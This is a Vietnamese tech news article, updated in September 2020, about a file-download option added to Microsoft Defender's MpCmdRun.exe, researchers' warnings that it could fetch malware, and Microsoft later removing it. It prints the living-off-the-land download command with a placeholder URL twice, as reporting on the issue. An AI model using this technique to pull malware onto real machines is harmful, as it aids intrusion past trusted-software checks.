Microsoft xóa tính năng có thể bị lợi dụng để tải về mã độc trên Microsoft Defender

Microsoft đã xóa tính năng tải về tập tin của Microsoft Defender

Cập nhật ngày 19/9/2020

Như tin đã đưa, tuần trước Microsoft đã âm thầm thêm vào Microsoft Defender tính năng tải về tập tin bằng các dòng lệnh. Ngay lập tức, các chuyên gia bảo mật đã lên tiếng cảnh báo rằng tính năng này có thể bị lợi dụng để tải về mã độc.

Nhiều thử nghiệm đã được tiến hành và theo BleepingComputer, tính năng này có thể tải về được cả ransomware và virus. Tại thời điểm đó, khi được hỏi về tính năng này, Micorosoft tuyên bố rằng họ không có bất cứ bình luận nào.

Vài ngày sau, Microsoft đã có thông tin giải đáp nghi vấn của các nhà nghiên cứu bảo mật. Microsoft tuyên bố: “Phần mềm diệt virus Microsoft Defender và Microsoft Defender ATP luôn luôn bảo vệ người dùng khỏi các loại mã độc. Những phần mềm này có thể phát hiện được các tập tin chứa mã độc được tải về máy tính của người dùng thông qua tính năng tải về của chính nó (MpCmdRun.exe)”.

Dẫu vậy, các chuyên gia bảo mật vẫn giữ nguyên quan điểm của mình. Họ cho rằng việc duy trì một công cụ tải về nằm ngay trong chính Microsoft Defender sẽ tiềm ẩn nhiều nguy hiểm cho người dùng.

Trước sức ép của các nhà nghiên cứu bảo mật, Microsoft đã phải có sự nhượng bộ. Trong bản cập nhật Microsoft Defender Antimalware Client 4.18.2009.2-0 vừa được tung ra, Microsoft đã loại bỏ tính năng tải về tập tin trong MpCmdRun.exe.

Sau khi cập nhật, khi người dùng cố tình tải về tập tin bằng MpCmdRun.exe cửa sổ lệnh CMD sẽ báo lỗi. Dòng mô tả chức năng -dowloadfile cũng bị loại bỏ khỏi màn hình hỗ trợ của MpCmdRun.exe.


Microsoft bảo không sao hết

Cập nhật ngày 08/9/2020

Gần đây các chuyên gia bảo mật lên tiếng cảnh báo rằng tính năng tải về tập tin vừa được cập nhật của Microsoft Defender có thể gây nguy hiểm cho người dùng. Cụ thể, Microsoft Defender có thể tải xuống tập tin bằng các sử dụng câu lệnh sau:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]

Các chuyên gia bảo mật đều đồng ý rằng tính năng này làm tăng attack surface (bề mặt tấn công) của Windows 10. Nó cũng có thể bị tin tặc lợi dụng để tải tập tin chứa mã độc vào máy tính của nạn nhân.

Microsoft phủ nhận tính năng mới của Microsoft Defender là một nguy cơ bảo mật
Microsoft phủ nhận tính năng mới của Microsoft Defender là một nguy cơ bảo mật

Đáp lại nghi vấn của các chuyên gia bảo mật, Microsoft đã lên tiếng trấn an. Microsoft tuyên bố: "Phần mềm diệt virus Microsoft Defender và Microsoft Defender ATP luôn luôn bảo vệ người dùng khỏi các loại mã độc. Những phần mềm này có thể phát hiện được các tập tin chứa mã độc được tải về máy tính của người dùng thông qua tính năng tải về của chính nó (MpCmdRun.exe)”.

Microsoft cũng cho biết rằng tin tặc không thể sử dụng tính năng này để nâng cấp đặc quyền kiểm soát hệ thống.

Mặc dù Microsoft phủ nhận tính năng mà họ mới thêm vào Microsoft Defender là một nguy cơ bảo mật. Tuy nhiên, tất cả mọi người đều nên biết rằng khi attack surface càng lớn thì hệ thống càng kém an toàn. Một số người dùng còn báo cáo rằng họ không thể khóa tính năng mới này.

Tính năng mới của Windows Defender được Microsoft đưa lên Windows 10 Home, Pro, Enterprise và các phiên bản Windows 10 cài sẵn Windows Defender Antivirus.


Microsoft Defender có thể bị lợi dụng để tải xuống mã độc

Trong bản cập nhật gần đây công cụ MpCmdRun.exe bên trong Microsoft Defender cho Windows 10 được bổ sung thêm tính năng tải về tập tin. Lợi dụng điều này, tin tặc có thể tải về mã độc và các phần mềm độc hại khác bằng chính Microsoft Defender. Đây là phương thức tấn công có tên living of the land, tận dụng chính những thứ có sẵn trên máy tính của nạn nhân để tấn công nạn nhân.

Nhà nghiên cứu bảo mật Mohammad Askar là người đầu tiên phát hiện ra vấn đề này. Để tải về mã độc bằng Microsoft Defender qua công cụ MpCmdRun.exe, tin tặc có thể sử dụng dòng lệnh sau:

MpCmdRun.exe -DownloadFile -url [url] -path [path_to_save_file]
MpCmdRun.exe có thêm chức năng tải tập tin
MpCmdRun.exe có thêm chức năng tải tập tin

Trong thử nghiệm nội bộ, trang BleepingComputer.com đã có thể tải về tập tin bằng Microsoft Defender phiên bản 4.18.2007.9 hoặc 4.18.2009.9. Như bạn có thể thấy, BleepingComputer đã có thể tải về tập tin resources.exe chứa mã nguồn của ransomware WastedLocker từng được sử dụng trong cuộc tấn công vào hãng Garmin mới đây.

BleepingComputer tải về thành công ransomware WastedLocker
BleepingComputer tải về thành công ransomware WastedLocker

Tin vui là Microsoft Defender có thể phát hiện ra các tập tin chứa mã độc được tải về qua MpCmdRun.exe. Hơn nữa, để thực hiện phương thức tấn công này, tin tặc phải chiếm được quyền điều khiển thiết bị của nạn nhân. 

Hiện vẫn chưa rõ phương thức tải tập tin qua MpCmdRun.exe có thể giúp mã độc vượt qua sự kiểm soát của các phần mềm diệt virus khác hay không.

Mohammad Askar đã thông báo vấn đề của Microsoft Defender cho phía Microsoft. Hy vọng rằng Microsoft sẽ sớm đưa ra giải pháp khắc phục. Trước Microsoft Defender, một loạt chương trình Windows đã bị tin tặc lợi dụng để tấn công chính Windows.

Thứ Bảy, 19/09/2020 10:35
31 👨 1.736